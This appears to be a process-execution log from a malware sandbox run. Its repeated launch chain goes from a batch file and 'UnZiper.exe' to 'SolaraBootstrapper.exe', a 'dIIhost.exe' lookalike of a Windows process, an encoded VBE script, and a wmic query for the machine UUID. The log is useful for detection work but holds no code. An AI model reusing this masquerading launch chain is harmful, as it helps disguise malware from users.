C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
